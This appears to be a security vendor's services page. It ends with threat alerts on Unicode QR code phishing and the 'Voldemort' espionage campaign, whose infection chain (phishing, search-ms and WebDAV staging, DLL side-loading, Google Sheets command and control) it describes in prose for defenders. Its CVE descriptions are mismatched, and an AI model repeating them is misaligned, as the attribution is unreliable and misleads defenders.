SecOps & Risk mitigation
CyberProof uses OSINT and threat intelligence feeds for visibility into threats.
CyberProof’s adaptable playbooks address continuously evolving threats with updated strategies.
Professionals manage sophisticated networks, leveraging experience to counter advanced threats.
Professionals manage sophisticated networks, leveraging experience to counter advanced threats.
24/7 global SOC support ensures incident response with guaranteed SLA.
24/7 global SOC support ensures incident response with guaranteed SLA.
CyberProof develops recovery plans, restoring capabilities after a cyber incident.
Classify and manage enterprise assets, understanding risks and data sensitivity.
Non-destructive tests uncover potential exploits in assets and applications.
Mitigate security issues early with CyberProof’s training and awareness programs.
Rigorous security assessment for on-premise and cloud applications to ensure protection.
IAM manages user access, monitors for anomalies, ensuring security.
Cloud First approach ensures compliance and security within cloud environments.
Managed service for SIEM, EDR, MXDR, and threat intelligence solutions.
Identify, assess, and mitigate security vulnerabilities through regular scanning.
Partners
See all partnersCase Studies
90% increase in visibility after deploying Microsoft XDR with CyberProof
Enterprise saves millions on data ingestion & storage following cloud migration.
International logistics company sees 40% savings in security operations costs
Threat Alerts
Unicode QR Code Scams: Bypassing Security with Invisible Threats
Researchers have discovered a new cyber threat called “Unicode QR Code Phishing”, where attackers use Unicode text characters to create QR codes that evade traditional image-based security measures. This technique takes advantage of the ubiquity of QR codes in digital interactions, which has led to a significant rise in QR code phishing attacks. Traditional defenses that scan for suspicious images are ineffective against this text-based approach. These Unicode QR codes can be scanned and function correctly on smartphones, yet look different in plain text, complicating their detection. The rise of this new threat, with a reported 587% increase in attacks, underscores the need for updated security strategies to address these sophisticated phishing techniques.
New Voldemort Espionage Campaign
Security researchers have identified a sophisticated malware campaign named “Voldemort”, which likely represents an espionage operation. The campaign employed a novel attack chain that blends commonly used techniques with less frequent methods like using Google Sheets for command and control (C&C) and abusing file schema URIs for malware staging. The malware exploits vulnerabilities such as CVE-2023-23397 (Windows search protocol) and CVE-2023-21716 (DLL hijacking) to infiltrate systems and execute malicious payloads. The campaign has targeted a wide range of organizations globally, posing a threat due to its advanced capabilities, especially in intelligence gathering.
The infection chain begins with phishing emails impersonating tax authorities from various countries, designed to deceive recipients into clicking on malicious links. These emails contain URLs that lead to a landing page hosted on InfinityFree, which checks the User Agent of the user’s browser. If the User Agent indicates a Windows environment, the browser is redirected to a search-ms URI, prompting the user to open Windows Explorer and load a file from a WebDAV share. This file, disguised as a local PDF, is actually a Windows shortcut (LNK) or ZIP file containing a similar LNK, which, when executed, invokes PowerShell to run Python scripts directly from the WebDAV share without downloading them locally.
The malware then collects system information, including the computer name, Windows version, and CPU details, sending this data to the attacker’s server. It downloads a decoy PDF to distract the user while extracting and executing a password-protected ZIP file containing a DLL vulnerable to side-loading via a legitimate executable. The DLL, named “Voldemort,” then connects to a Google Sheets-based C&C, where it uploads the user’s system information and awaits further commands.